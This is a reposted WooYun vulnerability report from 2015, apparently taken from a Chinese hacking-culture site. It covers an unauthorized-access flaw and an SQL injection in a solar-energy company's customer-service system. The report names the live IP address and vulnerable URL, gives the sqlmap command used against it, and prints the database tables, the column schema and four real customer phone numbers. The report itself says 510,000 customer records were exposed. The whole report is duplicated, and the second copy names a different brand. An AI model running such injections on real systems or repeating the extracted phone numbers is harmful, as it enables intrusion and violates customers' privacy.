记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

亿家能太阳能某系统一处越权\SQL注射泄露51W客户信息(姓名/地址/号码/安装单等)

2015-11-24 12:40

亿家能太阳能客服系统

code 区域
http://218.56.138.156:8080/web/manager/



存在越权url

code 区域
http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456



K1.png



k2.png



其中agentNo是可以任意变换的

此处也是一处sql注入漏洞

code 区域
sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs



k3.png



查看当前库是ecs

K4.png



列表列数据量

code 区域
Database: ecs

+--------------------------------+---------+

| Table | Entries |

+--------------------------------+---------+

| dbo.chanpinxinxi | 1232569 |

| dbo.salebill | 989634 |

| dbo.fahuoxinxi | 971554 |

| dbo.vistorBack | 518859 |

| dbo.building | 515518 |

| dbo.ProductSwap | 407312 |

| dbo.UserTable | 212813 |

| dbo.callerWorkStat | 150036 |

| dbo.LinkTelArea | 138625 |

| dbo.telInfo | 138280 |

| dbo.AssessmentFactorInfo | 42993 |

| dbo.SettleAccountsItems | 36245 |

| dbo.HistorySettleAccountsItems | 17834 |

| dbo.Tmp | 16654 |

| dbo.xilieinfo | 7161 |

| dbo.city | 3238 |

| dbo.UserRole | 2595 |

| dbo.refer | 2584 |

| dbo.Pd_Process | 2582 |

| dbo.pd | 2484 |

| dbo.v_goods | 2445 |



工单回访表:

code 区域
vistorBack



K5.png



列columns

code 区域
Table: vistorBack

[32 columns]

+------------------+---------+

| Column | Type |

+------------------+---------+

| AgentNo | varchar |

| BuildingResult | varchar |

| callTel | varchar |

| Card | varchar |

| content | varchar |

| firstVistorDate | varchar |

| Id | bigint |

| Isbw | int |

| IsDel | varchar |

| Isgd | int |

| Ispj | int |

| IsVisitor | varchar |

| LeaveBillNo | varchar |

| LeaveBillNo2 | varchar |

| memom | varchar |

| openTime | varchar |

| operateDate | varchar |

| other | varchar |

| Province | varchar |

| Reason | varchar |

| require | varchar |

| satisfaction | varchar |

| secondVistorDate | varchar |

| ServiceType | varchar |

| thirdVistorDate | varchar |

| verify | int |

| verifyContent | varchar |

| verifyDate | varchar |

| verifyPerson | varchar |

| verifyValidate | int |

| VistorTime | varchar |

| zt | varchar |

+------------------+---------+



涉及客户信息,列号码字段数据演示:



code 区域
Database: ecs

Table: vistorBack

[4 entries]

+--------------+

| callTel |

+--------------+

| 051683202555 |

| 83686959 |

| 85696735 |

| 87792024 |

+--------------+

漏洞证明:

皇明太阳能客服系统

code 区域
http://218.56.138.156:8080/web/manager/



存在越权url

code 区域
http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=123456



K1.png



k2.png



其中agentNo是可以任意变换的

此处也是一处sql注入漏洞

code 区域
sqlmap.py -u "http://218.56.138.156:8080/web/servlet/vistor?type=vistorBuilding&agentNo=654321" --dbs



k3.png



查看当前库是ecs

K4.png



列表列数据量

code 区域
Database: ecs

+--------------------------------+---------+

| Table | Entries |

+--------------------------------+---------+

| dbo.chanpinxinxi | 1232569 |

| dbo.salebill | 989634 |

| dbo.fahuoxinxi | 971554 |

| dbo.vistorBack | 518859 |

| dbo.building | 515518 |

| dbo.ProductSwap | 407312 |

| dbo.UserTable | 212813 |

| dbo.callerWorkStat | 150036 |

| dbo.LinkTelArea | 138625 |

| dbo.telInfo | 138280 |

| dbo.AssessmentFactorInfo | 42993 |

| dbo.SettleAccountsItems | 36245 |

| dbo.HistorySettleAccountsItems | 17834 |

| dbo.Tmp | 16654 |

| dbo.xilieinfo | 7161 |

| dbo.city | 3238 |

| dbo.UserRole | 2595 |

| dbo.refer | 2584 |

| dbo.Pd_Process | 2582 |

| dbo.pd | 2484 |

| dbo.v_goods | 2445 |



工单回访表:

code 区域
vistorBack



K5.png



列columns

code 区域
Table: vistorBack

[32 columns]

+------------------+---------+

| Column | Type |

+------------------+---------+

| AgentNo | varchar |

| BuildingResult | varchar |

| callTel | varchar |

| Card | varchar |

| content | varchar |

| firstVistorDate | varchar |

| Id | bigint |

| Isbw | int |

| IsDel | varchar |

| Isgd | int |

| Ispj | int |

| IsVisitor | varchar |

| LeaveBillNo | varchar |

| LeaveBillNo2 | varchar |

| memom | varchar |

| openTime | varchar |

| operateDate | varchar |

| other | varchar |

| Province | varchar |

| Reason | varchar |

| require | varchar |

| satisfaction | varchar |

| secondVistorDate | varchar |

| ServiceType | varchar |

| thirdVistorDate | varchar |

| verify | int |

| verifyContent | varchar |

| verifyDate | varchar |

| verifyPerson | varchar |

| verifyValidate | int |

| VistorTime | varchar |

| zt | varchar |

+------------------+---------+



涉及客户信息,列号码字段数据演示:



code 区域
Database: ecs

Table: vistorBack

[4 entries]

+--------------+

| callTel |

+--------------+

| 051683202555 |

| 83686959 |

| 85696735 |

| 87792024 |

+--------------+

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0145726

阅读:102675 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“亿家能太阳能某系统一处越权\SQL注射泄露51W客户信息(姓名/地址/号码/安装单等)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云